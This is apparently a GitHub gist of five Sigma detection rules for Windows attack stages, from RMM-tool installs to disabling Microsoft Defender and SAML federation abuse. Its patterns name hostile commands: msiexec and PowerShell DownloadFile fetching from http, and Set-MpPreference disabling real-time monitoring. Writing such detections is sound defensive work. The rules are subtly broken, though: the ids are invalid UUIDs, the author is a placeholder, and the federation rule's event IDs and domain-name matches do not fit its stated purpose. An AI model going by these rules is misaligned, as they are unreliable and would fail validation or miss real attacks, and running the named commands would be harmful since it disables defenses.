Skip to content

Instantly share code, notes, and snippets.

@pedramamini
Created October 9, 2024 16:13
Show Gist options
  • Save pedramamini/5c98dfa1c748712a6a277d599f0ef630 to your computer and use it in GitHub Desktop.
Save pedramamini/5c98dfa1c748712a6a277d599f0ef630 to your computer and use it in GitHub Desktop.
#### Sigma Rule: Initial Access via Social Engineering and RMM Tool Installation
```yaml
title: Initial Access via Social Engineering and RMM Tool Installation
id: 1a2b3c4d-5e6f-7g8h-9i0j-1k2l3m4n5o6p
description: Detects the installation of Remote Monitoring and Management (RMM) utilities following social engineering attacks, which may indicate initial access by threat actors.
status: experimental
author: Your Name
logsource:
category: process_creation
product: windows
detection:
selection1:
Image|endswith:
- '\\msiexec.exe'
CommandLine|contains:
- '/i'
- 'http'
selection2:
ParentImage|endswith:
- '\\powershell.exe'
CommandLine|contains|all:
- 'DownloadFile'
- 'http'
condition: selection1 or selection2
falsepositives:
- Legitimate RMM tool installations by administrators
level: high
tags:
- attack.initial_access
- attack.t1566
```
#### End of Sigma Rule
#### Sigma Rule: Enumeration and Discovery via AD Recon Tools
```yaml
title: Enumeration and Discovery via AD Recon Tools
id: 2b3c4d5e-6f7g-8h9i-0j1k-2l3m4n5o6p7q
description: Detects the use of Active Directory reconnaissance tools such as PingCastle and ADRecon, which may indicate enumeration and discovery activities by threat actors.
status: experimental
author: Your Name
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- '\\PingCastle.exe'
- '\\ADRecon.ps1'
condition: selection
falsepositives:
- Legitimate security assessments and audits
level: medium
tags:
- attack.discovery
- attack.t1087.002
```
#### End of Sigma Rule
#### Sigma Rule: Privilege Escalation via SIM Swap or Call Forwarding
```yaml
title: Privilege Escalation via SIM Swap or Call Forwarding for Password Reset
id: 3c4d5e6f-7g8h-9i0j-1k2l-3m4n5o6p7q8r
description: Detects changes to user multi-factor authentication settings or password resets that may indicate privilege escalation following a SIM swap or call forwarding attack.
status: experimental
author: Your Name
logsource:
category: authentication_logs
product: windows
detection:
selection:
EventID:
- '4724' # An attempt was made to reset an account's password.
- '4723' # An attempt was made to change an account's password.
TargetUserName|endswith:
- 'admin'
- 'administrator'
condition: selection
falsepositives:
- Legitimate password reset by administrators or help desk personnel
level: high
tags:
- attack.privilege_escalation
- attack.t1078
```
#### End of Sigma Rule
#### Sigma Rule: Defense Evasion by Disabling Security Products via Compromised Accounts
```yaml
title: Defense Evasion by Disabling Security Products via Compromised Accounts
id: 4d5e6f7g-8h9i-0j1k-2l3m-4n5o6p7q8r9s
description: Detects attempts to disable or impair security products using compromised security personnel accounts, which may indicate defense evasion activities by threat actors.
status: experimental
author: Your Name
logsource:
category: process_creation
product: windows
detection:
selection1:
Image|endswith:
- '\\powershell.exe'
CommandLine|contains|all:
- 'Set-MpPreference'
- '-DisableRealtimeMonitoring $true'
selection2:
Image|endswith:
- '\\cmd.exe'
CommandLine|contains:
- 'net stop'
condition: selection1 or selection2
falsepositives:
- Legitimate security product configuration changes by administrators
level: critical
tags:
- attack.defense_evasion
- attack.t1562.001
```
#### End of Sigma Rule
#### Sigma Rule: Persistence via Federated Identity Abuse and SAML Tokens
```yaml
title: Persistence via Federated Identity Abuse and SAML Tokens
id: 5e6f7g8h-9i0j-1k2l-3m4n-5o6p7q8r9s0t
description: Detects federation changes or unusual SAML token generation activities that may indicate persistence mechanisms employed by threat actors through identity federation abuse.
status: experimental
author: Your Name
logsource:
category: authentication_logs
product: windows
detection:
selection1:
EventID:
- '4741' # A computer account was created.
- '4726' # A user account was deleted.
TargetDomainName|contains|all:
- 'federated'
- 'saml'
selection2:
EventID: '4769' # A Kerberos service ticket was requested.
TicketOptions|contains|all:
- 'renewable'
- 'forwardable'
ServiceName|contains:
- 'federated'
condition: selection1 or selection2
falsepositives:
- Legitimate federation changes by administrators for business needs
level: high
tags:
- attack.persistence
- attack.t1484.002
```
#### End of Sigma Rule
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment